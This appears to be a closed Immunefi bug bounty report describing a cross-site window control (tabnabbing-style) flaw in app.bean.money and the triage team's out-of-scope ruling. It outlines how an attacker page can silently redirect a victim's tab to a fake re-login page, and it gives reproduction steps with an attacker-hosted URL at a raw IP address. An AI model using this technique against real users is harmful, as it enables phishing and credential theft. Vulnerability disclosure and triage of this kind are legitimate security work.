Report #33046

Report Date

July 9, 2024

Status

Closed

Payout

Cross-Site Window Control Allows an Attacker to Control Navigations

‣

Report Info

Report ID

#33046

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

Redirecting users to malicious websites

Description

This report aims to describe a vulnerability affecting your company, which enables a malicious actor to manipulate navigations originating from your domain if the web application is accessed via a compromised web app. This vulnerability can be exploited in numerous ways to deceive users, steal their credentials, disclose personal information, or distribute malware to their devices. The vulnerability arises because your web app lacks safeguards to prevent shared context between a window running your app and a parent window controlled by an attacker that opened your app. This allows attackers to assume control of the window and potentially guide users to malicious web apps, deceiving them into believing the sites are legitimate and trustworthy.

Why is this your responsibility

Security is a shared responsibility, yet cross-site attacks like this one exploits the users' trust in your application. Just like XSS attacks for instance, it is the users' trust that your webapp is integral and free from exploits that make using it possible for them. Since the only reason why this is possible is because of the lack of protection mentioned above, it is your responsibility to ensure that this can't happen.

Explanation

This vulnerability arises because your web application lacks safeguards against cross-origin manipulation, allowing it to be influenced by other applications that have opened it. Implementing the Cross-Origin-Opener-Policy: same-origin HTTP header across your applications can effectively mitigate this issue. It's important to recognize that this type of attack has a high success rate compared to traditional phishing methods. Here's why:

The attacker's web application initially opens your legitimate website. This allows even cautious users to verify that they are indeed interacting with your authentic site.
Users can interact with your domain as usual for a period of time.
Later, without the user initiating any action, they may notice their session window refreshing and prompting them to re-authenticate—an action typical of many web applications when sessions expire. Due to the seamless nature of the attack, users are unlikely to realize they have been redirected to a different web application, relying on their trust in the integrity of your application.
Once the user re-authenticates, the attacker can redirect them back to your legitimate website, potentially leaving the user unaware they were targeted in this attack.

Proof of concept

Steps to Reproduce

Visit the attacker's website, for example: http://93.95.230.187/cross-site-window.html?target=https://app.bean.money/
In this demo, Click the image. Take Note: that the attacker can also change this by hovering in an image or just a timeout.
the webpage will open another tab, and wait for 10 seconds.
it will be redirected to another page. could be phishing, malicious site.

Immunefi Response

Unfortunately, after reviewing your report, Immunefi has decided to close it due to the assessed impact being out of scope.
Immunefi review:
The claimed impact Redirecting users to malicious websites by the whitehat is in the scope of the bug bounty program but the assessed impact doesn't match with the claimed impact for the following reasons.
After the review, we determined that the described issue falls out of scope because it requires the victim to visit an attacker-controlled malicious website that performs the redirect, rather than the asset in scope performing the redirect. Therefore, the issue is not applicable.
assessed asset by the triage team is in scope for the bug bounty program
PoC has been submitted to the project
Please note that the project will receive a report of the closed submission and may choose to re-open it, but they are not obligated to do so.